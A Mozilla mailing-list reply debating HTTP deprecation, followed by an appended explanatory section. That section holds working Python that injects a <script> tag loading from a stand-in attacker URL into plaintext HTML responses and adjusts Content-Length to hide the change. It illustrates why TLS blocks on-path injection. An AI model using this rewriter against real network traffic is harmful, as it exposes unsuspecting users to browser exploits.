Steve Fink wrote:
> On 12/20/2016 06:20 PM, Edmund Wong wrote:
>> Richard Barnes wrote:
>>
>>> Broadly speaking, this plan would entail limiting new features to secure
>>> contexts, followed by gradually removing legacy features from insecure
>>> contexts. Having an overall program for HTTP deprecation makes a clear
>>> statement to the web community that the time for plaintext is over -- it
>> There is nothing wrong with plaintext just as long as it isn't something
>> credential-like. Also, what you're doing will only make a clear
>> statement to the web community that you are forcing something on them
>> and limiting THEIR choices of broadcasting their information as they
>> see fit.
>>
>> IOW, "deprecating HTTP" is not a good idea.
>
> If I have a browser exploit that I can embed in a <script> tag, I can
> inject it into all of the HTTP network traffic on my LAN. Not so nice if
> visiting an HTTP website at Starbucks or the public library gets you pwned.
>
Point taken. Someone could just as well crack into a server that has
HTTPS and hijack it to inject HTTPS-enabled browser exploits. Sure, it's
not as simple as injecting it in HTTP traffic, but that still could
happen. No amount of HTTPS could prevent your system being pwned, which
is why defense in layers is the best security.

In any event, the choice is Mozilla's.

Edmund
_______________________________________________
dev-platform mailing list
dev-platform@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-platform
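The on-path injection Steve Fink describes above, as an added example that is not part of the thread and not code from anyone on it: a minimal rewriter of the kind an attacker on the same LAN (or running a rogue access point) can apply to plaintext HTTP responses. It inserts a <script> tag before </body> of an HTML response and fixes up Content-Length so the victim's browser reads the whole injected body. Run over what the same attacker captures from an HTTPS session, a TLS application-data record, it finds nothing to rewrite because the HTML is ciphertext. The response bytes, the TLS record bytes and the attacker script URL (in the 192.0.2.0/24 documentation range) are all constructed for illustration.

```python
"""On-path <script> injection into plaintext HTTP, and why TLS defeats it."""
from typing import Optional, Tuple

# Constructed sample traffic (not captured from any real site or network).
PLAIN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: 52\r\n"
    b"\r\n"
    b"<html><body><h1>Library catalogue</h1></body></html>"
)
PLAIN_JSON = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: 13\r\n"
    b"\r\n"
    b'{"items": []}'
)
# What the attacker sees from an HTTPS session instead: a TLS 1.2 application-data
# record (type 0x17, version 0x0303, 16-byte length) followed by ciphertext.
# The payload bytes are constructed, not real ciphertext.
TLS_RECORD = b"\x17\x03\x03\x00\x10" + bytes(range(0x90, 0xA0))
# Hypothetical attacker-controlled script location.
ATTACKER_SCRIPT = "http://192.0.2.10/x.js"


def _split(raw: bytes):
    """Split a plaintext HTTP/1.x response into (status, header lines, headers, body).
    Returns None for anything that is not a plaintext HTTP response."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep or not head.startswith(b"HTTP/1."):
        return None
    status, *lines = head.split(b"\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return status, lines, headers, body


def inject_script(raw: bytes, script_src: str) -> Optional[bytes]:
    """Return the response with a <script> tag inserted, or None when the
    bytes are not a plaintext HTML response this simple rewriter can handle."""
    parsed = _split(raw)
    if parsed is None:
        return None                       # e.g. TLS records: no HTTP to rewrite
    status, lines, headers, body = parsed
    if not headers.get(b"content-type", b"").startswith(b"text/html"):
        return None                       # only HTML will execute the script
    if b"content-encoding" in headers or b"transfer-encoding" in headers:
        return None                       # compressed/chunked bodies: out of scope here
    tag = b'<script src="' + script_src.encode() + b'"></script>'
    idx = body.lower().rfind(b"</body>")
    new_body = body[:idx] + tag + body[idx:] if idx != -1 else body + tag
    # Rewrite Content-Length so the victim's browser consumes the injected body.
    new_lines = [status]
    for line in lines:
        if line.lower().startswith(b"content-length:"):
            new_lines.append(b"Content-Length: " + str(len(new_body)).encode())
        else:
            new_lines.append(line)
    return b"\r\n".join(new_lines) + b"\r\n\r\n" + new_body


def declared_and_actual_length(raw: bytes) -> Tuple[int, int]:
    """Return (Content-Length as declared, actual body length) so a rewrite
    can be checked for framing consistency."""
    parsed = _split(raw)
    if parsed is None:
        raise ValueError("not a plaintext HTTP response")
    _, _, headers, body = parsed
    return int(headers[b"content-length"]), len(body)


if __name__ == "__main__":
    print(inject_script(PLAIN_RESPONSE, ATTACKER_SCRIPT).decode())
    print("TLS record ->", inject_script(TLS_RECORD, ATTACKER_SCRIPT))
```

The Content-Type and Content-Encoding checks are the part of this that a practitioner would want to see: a rewriter that blindly appends to every plaintext response corrupts images and compressed pages and gets noticed, whereas one that only touches uncompressed HTML is silent. Edmund's counter-case, a compromised origin serving the exploit over HTTPS, is a different threat that transport encryption does not address; what the example shows is only that the LAN-level rewrite Steve describes needs the body in the clear.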